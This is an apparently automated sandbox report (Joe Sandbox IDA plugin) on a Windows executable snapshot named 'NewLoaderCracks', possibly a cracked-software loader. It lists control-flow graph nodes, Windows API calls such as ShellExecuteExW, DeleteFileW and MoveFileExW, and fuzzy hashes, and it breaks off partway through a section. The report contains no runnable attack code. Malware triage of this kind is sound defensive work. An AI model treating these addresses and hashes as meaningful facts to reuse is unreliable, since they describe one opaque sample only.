55c2c7-55c318 call 54fe56 call 55a8d0 GetDlgItem SetWindowTextW SendMessageW call 5635e9 491->505 506 55c2bc-55c2c0 491->506 512 55c060-55c06f call 54a4b3 494->512 513 55bf0b-55bf1f SetFileAttributesW 494->513 529 55c220 495->529 530 55c222-55c224 495->530 502 55c235-55c24d call 5635b3 496->502 503 55c261-55c284 call 5635b3 * 2 496->503 502->503 516 55c24f-55c25c call 54fe2e 502->516 503->491 534 55c286-55c294 call 54fe2e 503->534 540 55c31d-55c321 505->540 506->505 511 55c2c2-55c2c4 506->511 511->505 512->427 518 55bfc5-55bfd5 GetFileAttributesW 513->518 519 55bf25-55bf58 call 54b4f7 call 54b207 call 5635b3 513->519 516->503 518->494 527 55bfd7-55bfe6 DeleteFileW 518->527 549 55bf6b-55bf79 call 54b925 519->549 550 55bf5a-55bf69 call 5635b3 519->550 527->494 533 55bfe8-55bfeb 527->533 529->530 530->496 537 55bfef-55c01b call 54400a GetFileAttributesW 533->537 534->491 547 55bfed-55bfee 537->547 548 55c01d-55c033 MoveFileW 537->548 540->427 544 55c327-55c33b SendMessageW 540->544 544->427 547->537 548->494 551 55c035-55c03f MoveFileExW 548->551 549->512 556 55bf7f-55bfbe call 5635b3 call 55f350 549->556 550->549 550->556 551->494 556->518
                APIs
                • __EH_prolog.LIBCMT ref: 0055BDFA
                  • Part of subcall function 0055AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0055AAFE
                • SetWindowTextW.USER32(?,?), ref: 0055C127
                • _wcsrchr.LIBVCRUNTIME ref: 0055C2B1
                • GetDlgItem.USER32(?,00000066), ref: 0055C2EC
                • SetWindowTextW.USER32(00000000,?), ref: 0055C2FC
                • SendMessageW.USER32(00000000,00000143,00000000,0058A472), ref: 0055C30A
                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0055C335
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                • API String ID: 3564274579-312220925
                • Opcode ID: 760b2dc180ce1163df2e0b23ff3f77bc4244fdb7092f8892fc3f508342201ad5
                • Instruction ID: f9689fe3bc8b4f77d8886783806681fc4f878358bc406526c5e97b9879f1a586
                • Opcode Fuzzy Hash: 760b2dc180ce1163df2e0b23ff3f77bc4244fdb7092f8892fc3f508342201ad5
                • Instruction Fuzzy Hash: 56E16E76D00219AADF25DBA4DC59DEE7F7CBF59312F0040A7F909E3051EA709A889B60

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 561 54d341-54d378 call 55e28c call 55e360 call 5615e8 568 54d37a-54d3a9 GetModuleFileNameW call 54bc85 call 54fe2e 561->568 569 54d3ab-54d3b4 call 54fe56 561->569 573 54d3b9-54d3dd call 549619 call 5499b0 568->573 569->573 580 54d7a0-54d7a6 call 549653 573->580 581 54d3e3-54d3eb 573->581 586 54d7ab-54d7bb 580->586 583 54d3ed-54d405 call 553781 * 2 581->583 584 54d409-54d438 call 565a90 * 2 581->584 594 54d407 583->594 595 54d43b-54d43e 584->595 594->584 596 54d444-54d44a call 549e40 595->596 597 54d56c-54d58f call 549d30 call 5635d3 595->597 601 54d44f-54d476 call 549bf0 596->601 597->580 606 54d595-54d5b0 call 549bf0 597->606 607 54d535-54d538 601->607 608 54d47c-54d484 601->608 623 54d5b2-54d5b7 606->623 624 54d5b9-54d5cc call 5635d3 606->624 609 54d53b-54d55d call 549d30 607->609 611 54d486-54d48e 608->611 612 54d4af-54d4ba 608->612 609->595 628 54d563-54d566 609->628 611->612 617 54d490-54d4aa call 565ec0 611->617 614 54d4e5-54d4ed 612->614 615 54d4bc-54d4c8 612->615 621 54d4ef-54d4f7 614->621 622 54d519-54d51d 614->622 615->614 620 54d4ca-54d4cf 615->620 632 54d4ac 617->632 633 54d52b-54d533 617->633 620->614 629 54d4d1-54d4e3 call 565808 620->629 621->622 630 54d4f9-54d513 call 565ec0 621->630 622->607 631 54d51f-54d522 622->631 625 54d5f1-54d5f8 623->625 624->580 639 54d5d2-54d5ee call 55137a call 5635ce 624->639 636 54d5fc-54d625 call 54fdfb call 5635d3 625->636 637 54d5fa 625->637 628->580 628->597 629->614 644 54d527 629->644 630->580 630->622 631->608 632->612 633->609 651 54d627-54d62e call 5635ce 636->651 652 54d633-54d649 636->652 637->636 639->625 644->633 651->580 654 54d731-54d757 call 54ce72 call 5635ce * 2 652->654 655 54d64f-54d65d 652->655 694 54d771-54d79d call 565a90 * 2 654->694 695 54d759-54d76f call 553781 * 2 654->695 657 54d664-54d669 655->657 659 54d97c-54d984 657->659 660 54d66f-54d678 657->660 664 54d98a-54d98e 659->664 665 54d72b-54d72e 659->665 662 54d684-54d68b 660->662 663 54d67a-54d67e 660->663 667 54d880-54d891 call 54fcbf 662->667 668 54d691-54d6b6 662->668 663->659 663->662 669 54d990-54d996 664->669 670 54d9de-54d9e4 664->670 665->654 686 54d976-54d979 667->686 687 54d897-54d8c0 call 54fe56 call 565885 667->687 675 54d6b9-54d6de call 5635b3 call 565808 668->675 676 54d722-54d725 669->676 677 54d99c-54d9a3 669->677 673 54d9e6-54d9ec 670->673 674 54da0a-54da2a call 54ce72 670->674 673->674 680 54d9ee-54d9f4 673->680 699 54da02-54da05 674->699 713 54d6f6 675->713 714 54d6e0-54d6ea 675->714 676->657 676->665 683 54d9a5-54d9a8 677->683 684 54d9ca 677->684 680->676 689 54d9fa-54da01 680->689 692 54d9c6-54d9c8 683->692 693 54d9aa-54d9ad 683->693 688 54d9cc-54d9d9 684->688 686->659 687->686 721 54d8c6-54d93c call 551596 call 54fdfb call 54fdd4 call 54fdfb call 5658d9 687->721 688->676 689->699 692->688 701 54d9c2-54d9c4 693->701 702 54d9af-54d9b2 693->702 694->580 695->694 701->688 707 54d9b4-54d9b8 702->707 708 54d9be-54d9c0 702->708 707->680 709 54d9ba-54d9bc 707->709 708->688 709->688 715 54d6f9-54d6fd 713->715 714->713 719 54d6ec-54d6f4 714->719 715->675 720 54d6ff-54d706 715->720 719->715 722 54d70c-54d71a call 54fdfb 720->722 723 54d7be-54d7c1 720->723 753 54d93e-54d947 721->753 754 54d94a-54d95f 721->754 728 54d71f 722->728 723->667 727 54d7c7-54d7ce 723->727 730 54d7d6-54d7d7 727->730 731 54d7d0-54d7d4 727->731 728->676 730->727 731->730 733 54d7d9-54d7e7 731->733 734 54d808-54d830 call 551596 733->734 735 54d7e9-54d7ec 733->735 743 54d832-54d84e call 5635e9 734->743 744 54d853-54d85b 734->744 737 54d805 735->737 738 54d7ee-54d803 735->738 737->734 738->735 738->737 743->728 748 54d862-54d87b call 54dd6b 744->748 749 54d85d 744->749 748->728 749->748 753->754 756 54d960-54d967 754->756 757 54d973-54d974 756->757 758 54d969-54d96d 756->758 757->756 758->728 758->757
                APIs
                • __EH_prolog.LIBCMT ref: 0054D346
                • _wcschr.LIBVCRUNTIME ref: 0054D367
                • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,0054D328,?), ref: 0054D382
                • __fprintf_l.LIBCMT ref: 0054D873
                  • Part of subcall function 0055137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0054B652,00000000,?,?,?,00010408), ref: 00551396
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                • String ID: $ ,$$%s:$$9W$*messages***$*messages***$@%s:$R$RTL$a
                • API String ID: 4184910265-1921293341
                • Opcode ID: 562a4b20dbecd5484a4fd7d66c268665784bffa0b3f76807f264ebffed33b4f8
                • Instruction ID: 24b0250921925d87ce518ac5fe136e20d05afb0513e89e4f95a1340fe42a2e82
                • Opcode Fuzzy Hash: 562a4b20dbecd5484a4fd7d66c268665784bffa0b3f76807f264ebffed33b4f8
                • Instruction Fuzzy Hash: 5A12D571D0021A9ADF24DFA4DC85BEEBFB5FF44718F10456AF506A7281EB709A44CB24

                Control-flow Graph

                APIs
                  • Part of subcall function 0055AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0055AC85
                  • Part of subcall function 0055AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0055AC96
                  • Part of subcall function 0055AC74: IsDialogMessageW.USER32(00010408,?), ref: 0055ACAA
                  • Part of subcall function 0055AC74: TranslateMessage.USER32(?), ref: 0055ACB8
                  • Part of subcall function 0055AC74: DispatchMessageW.USER32(?), ref: 0055ACC2
                • GetDlgItem.USER32(00000068,0059ECB0), ref: 0055CB6E
                • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,0055A632,00000001,?,?,0055AECB,00574F88,0059ECB0), ref: 0055CB96
                • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0055CBA1
                • SendMessageW.USER32(00000000,000000C2,00000000,005735B4), ref: 0055CBAF
                • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0055CBC5
                • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0055CBDF
                • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0055CC23
                • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0055CC31
                • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0055CC40
                • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0055CC67
                • SendMessageW.USER32(00000000,000000C2,00000000,0057431C), ref: 0055CC76
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                • String ID: \
                • API String ID: 3569833718-2967466578
                • Opcode ID: 58ec1fa77f01ee8784d8e9407c7c53a0379a02e2298395f58a16448bea59edc0
                • Instruction ID: 71c6dff1e96fe470ba0ac0f776323346cd799d336441225317ac6fb1db0083eb
                • Opcode Fuzzy Hash: 58ec1fa77f01ee8784d8e9407c7c53a0379a02e2298395f58a16448bea59edc0
                • Instruction Fuzzy Hash: 5831E171149342AFE301DF24DC4AFAB7FACFB92705F010509FA50961A1DB644A0CE776

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 795 55ce22-55ce3a call 55e360 798 55ce40-55ce4c call 5635b3 795->798 799 55d08b-55d093 795->799 798->799 802 55ce52-55ce7a call 55f350 798->802 805 55ce84-55ce91 802->805 806 55ce7c 802->806 807 55ce95-55ce9e 805->807 808 55ce93 805->808 806->805 809 55ced6 807->809 810 55cea0-55cea2 807->810 808->807 812 55ceda-55cedd 809->812 811 55ceaa-55cead 810->811 813 55ceb3-55cebb 811->813 814 55d03c-55d041 811->814 815 55cee4-55cee6 812->815 816 55cedf-55cee2 812->816 817 55d055-55d05d 813->817 818 55cec1-55cec7 813->818 819 55d036-55d03a 814->819 820 55d043 814->820 821 55cef9-55cf0e call 54b493 815->821 822 55cee8-55ceef 815->822 816->815 816->821 825 55d065-55d06d 817->825 826 55d05f-55d061 817->826 818->817 823 55cecd-55ced4 818->823 819->814 824 55d048-55d04c 819->824 820->824 830 55cf27-55cf32 call 54a180 821->830 831 55cf10-55cf1d call 5517ac 821->831 822->821 827 55cef1 822->827 823->809 823->811 824->817 825->812 826->825 827->821 837 55cf34-55cf4b call 54b239 830->837 838 55cf4f-55cf5c ShellExecuteExW 830->838 831->830 836 55cf1f 831->836 836->830 837->838 840 55cf62-55cf6f 838->840 841 55d08a 838->841 843 55cf71-55cf78 840->843 844 55cf82-55cf84 840->844 841->799 843->844 845 55cf7a-55cf80 843->845 846 55cf86-55cf8f 844->846 847 55cf9b-55cfba call 55d2e6 844->847 845->844 848 55cff1-55cffd CloseHandle 845->848 846->847 853 55cf91-55cf99 ShowWindow 846->853 847->848 865 55cfbc-55cfc4 847->865 851 55cfff-55d00c call 5517ac 848->851 852 55d00e-55d01c 848->852 851->852 863 55d072 851->863 854 55d01e-55d020 852->854 855 55d079-55d07b 852->855 853->847 854->855 860 55d022-55d028 854->860 855->841 858 55d07d-55d07f 855->858 858->841 862 55d081-55d084 ShowWindow 858->862 860->855 864 55d02a-55d034 860->864 862->841 863->855 864->855 865->848 866 55cfc6-55cfd7 GetExitCodeProcess 865->866 866->848 867 55cfd9-55cfe3 866->867 868 55cfe5 867->868 869 55cfea 867->869 868->869 869->848
                APIs
                • ShellExecuteExW.SHELL32(?), ref: 0055CF54
                • ShowWindow.USER32(?,00000000), ref: 0055CF93
                • GetExitCodeProcess.KERNEL32(?,?), ref: 0055CFCF
                • CloseHandle.KERNEL32(?), ref: 0055CFF5
                • ShowWindow.USER32(?,00000001), ref: 0055D084
                  • Part of subcall function 005517AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0054BB05,00000000,.exe,?,?,00000800,?,?,005585DF,?), ref: 005517C2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                • String ID: $.exe$.inf
                • API String ID: 3686203788-2452507128
                • Opcode ID: 22d6f019b171b52167c31a0bdad98d9a6f4bb8a641b397c368579ba06a06ed06
                • Instruction ID: 7a054233a0a47ba0586b95df795aa23490ccda125f6b969536fbf5aca05da008
                • Opcode Fuzzy Hash: 22d6f019b171b52167c31a0bdad98d9a6f4bb8a641b397c368579ba06a06ed06
                • Instruction Fuzzy Hash: E661B0714043809EDB31DF2498296AB7FF9BF91346F04481BECC5972A1E7B1898DDB62

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 870 56a058-56a071 871 56a087-56a08c 870->871 872 56a073-56a083 call 56e6ed 870->872 873 56a08e-56a096 871->873 874 56a099-56a0bd MultiByteToWideChar 871->874 872->871 882 56a085 872->882 873->874 876 56a0c3-56a0cf 874->876 877 56a250-56a263 call 55ec4a 874->877 879 56a123 876->879 880 56a0d1-56a0e2 876->880 886 56a125-56a127 879->886 883 56a0e4-56a0f3 call 571a30 880->883 884 56a101-56a112 call 568518 880->884 882->871 887 56a245 883->887 897 56a0f9-56a0ff 883->897 884->887 898 56a118 884->898 886->887 888 56a12d-56a140 MultiByteToWideChar 886->888 892 56a247-56a24e call 56a2c0 887->892 888->887 891 56a146-56a158 call 56a72c 888->891 899 56a15d-56a161 891->899 892->877 901 56a11e-56a121 897->901 898->901 899->887 902 56a167-56a16e 899->902 901->886 903 56a170-56a175 902->903 904 56a1a8-56a1b4 902->904 903->892 905 56a17b-56a17d 903->905 906 56a1b6-56a1c7 904->906 907 56a200 904->907 905->887 908 56a183-56a19d call 56a72c 905->908 910 56a1e2-56a1f3 call 568518 906->910 911 56a1c9-56a1d8 call 571a30 906->911 909 56a202-56a204 907->909 908->892 925 56a1a3 908->925 914 56a206-56a21f call 56a72c 909->914 915 56a23e-56a244 call 56a2c0 909->915 910->915 924 56a1f5 910->924 911->915 923 56a1da-56a1e0 911->923 914->915 928 56a221-56a228 914->928 915->887 927 56a1fb-56a1fe 923->927 924->927 925->887 927->909 929 56a264-56a26a 928->929 930 56a22a-56a22b 928->930 931 56a22c-56a23c WideCharToMultiByte 929->931 930->931 931->915 932 56a26c-56a273 call 56a2c0 931->932 932->892
                APIs
                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00564E35,00564E35,?,?,?,0056A2A9,00000001,00000001,3FE85006), ref: 0056A0B2
                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0056A2A9,00000001,00000001,3FE85006,?,?,?), ref: 0056A138
                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0056A232
                • __freea.LIBCMT ref: 0056A23F
                  • Part of subcall function 00568518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0056C13D,00000000,?,005667E2,?,00000008,?,005689AD,?,?,?), ref: 0056854A
                • __freea.LIBCMT ref: 0056A248
                • __freea.LIBCMT ref: 0056A26D
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: ByteCharMultiWide__freea$AllocateHeap
                • String ID:
                • API String ID: 1414292761-0
                • Opcode ID: 76595f8f7c92acca2715ccf5fd1352df0ec21c4d6a84d420183935acc75ac111
                • Instruction ID: d19133a32320ca8b9c15f10522ec9434ec451719dfafe22929c2b5cbf632b3f0
                • Opcode Fuzzy Hash: 76595f8f7c92acca2715ccf5fd1352df0ec21c4d6a84d420183935acc75ac111
                • Instruction Fuzzy Hash: BF51D072650216AFEB258E74CC55EBB7FA9FB81760F144628FC05E7140EB35DC80DAA2

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 935 5499b0-5499d1 call 55e360 938 5499d3-5499d6 935->938 939 5499dc 935->939 938->939 940 5499d8-5499da 938->940 941 5499de-5499fb 939->941 940->941 942 549a03-549a0d 941->942 943 5499fd 941->943 944 549a12-549a31 call 5470bf 942->944 945 549a0f 942->945 943->942 948 549a33 944->948 949 549a39-549a57 CreateFileW 944->949 945->944 948->949 950 549a59-549a7b GetLastError call 54b66c 949->950 951 549abb-549ac0 949->951 959 549a7d-549a9f CreateFileW GetLastError 950->959 960 549aaa-549aaf 950->960 953 549ae1-549af5 951->953 954 549ac2-549ac5 951->954 957 549af7-549b0f call 54fe56 953->957 958 549b13-549b1e 953->958 954->953 956 549ac7-549adb SetFileTime 954->956 956->953 957->958 962 549aa5-549aa8 959->962 963 549aa1 959->963 960->951 964 549ab1 960->964 962->951 962->960 963->962 964->951
                APIs
                • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,005478AD,?,00000005,?,00000011), ref: 00549A4C
                • GetLastError.KERNEL32(?,?,005478AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00549A59
                • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,005478AD,?,00000005,?), ref: 00549A8E
                • GetLastError.KERNEL32(?,?,005478AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00549A96
                • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,005478AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00549ADB
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: File$CreateErrorLast$Time
                • String ID:
                • API String ID: 1999340476-0
                • Opcode ID: cd9173353533559696e1648da33f4cc46ff0c9e1e4fa1aacfdcffe543252c1c0
                • Instruction ID: a4fab81f586610e949281abc7ea0ebd97ec9336c1adab28e4008771e67c8e5d1
                • Opcode Fuzzy Hash: cd9173353533559696e1648da33f4cc46ff0c9e1e4fa1aacfdcffe543252c1c0
                • Instruction Fuzzy Hash: 4D4143305447466FE7208B20DC0ABEBBFD4BB45328F100719F9E8961D1E7B5A98CDB92

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 994 55ac74-55ac8d PeekMessageW 995 55ac8f-55aca3 GetMessageW 994->995 996 55acc8-55accc 994->996 997 55aca5-55acb2 IsDialogMessageW 995->997 998 55acb4-55acc2 TranslateMessage DispatchMessageW 995->998 997->996 997->998 998->996
                APIs
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0055AC85
                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0055AC96
                • IsDialogMessageW.USER32(00010408,?), ref: 0055ACAA
                • TranslateMessage.USER32(?), ref: 0055ACB8
                • DispatchMessageW.USER32(?), ref: 0055ACC2
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: Message$DialogDispatchPeekTranslate
                • String ID:
                • API String ID: 1266772231-0
                • Opcode ID: 9680567be7d3720cc341b8e9f86899589c81b65eb01e59f920fc1dd45f14a36c
                • Instruction ID: 86eb586bc9d0498bf591701d0511e9512b12a6846b9c6198533bcb704a2236d0
                • Opcode Fuzzy Hash: 9680567be7d3720cc341b8e9f86899589c81b65eb01e59f920fc1dd45f14a36c
                • Instruction Fuzzy Hash: 16F03071D02129AB8B20DBE5EC4DDEB7F6CFE16251B404515F915D2110EB34D40DD7B1

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 999 55a2c7-55a2e6 GetClassNameW 1000 55a30e-55a310 999->1000 1001 55a2e8-55a2fd call 5517ac 999->1001 1003 55a312-55a315 SHAutoComplete 1000->1003 1004 55a31b-55a31f 1000->1004 1006 55a30d 1001->1006 1007 55a2ff-55a30b FindWindowExW 1001->1007 1003->1004 1006->1000 1007->1006
                APIs
                • GetClassNameW.USER32(?,?,00000050), ref: 0055A2DE
                • SHAutoComplete.SHLWAPI(?,00000010), ref: 0055A315
                  • Part of subcall function 005517AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0054BB05,00000000,.exe,?,?,00000800,?,?,005585DF,?), ref: 005517C2
                • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0055A305
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AutoClassCompareCompleteFindNameStringWindow
                • String ID: EDIT
                • API String ID: 4243998846-3080729518
                • Opcode ID: a3e24ad31f259184b79794486daef1c3e24efaecb47bc45df59e34785a52197a
                • Instruction ID: 94c80fec9c373b82929b89846f371255a7c70154276e83040ee9ee3b59b88cc3
                • Opcode Fuzzy Hash: a3e24ad31f259184b79794486daef1c3e24efaecb47bc45df59e34785a52197a
                • Instruction Fuzzy Hash: B7F0A732A012287BEB3056689C0AFDB7BACBF47B11F050557BD05E2180D760AD49D6F6

                Control-flow Graph

                APIs
                  • Part of subcall function 00550085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 005500A0
                  • Part of subcall function 00550085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0054EB86,Crypt32.dll,00000000,0054EC0A,?,?,0054EBEC,?,?,?), ref: 005500C2
                • OleInitialize.OLE32(00000000), ref: 0055A34E
                • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0055A385
                • SHGetMalloc.SHELL32(00588430), ref: 0055A38F
                Strings
                Memory Dump Source
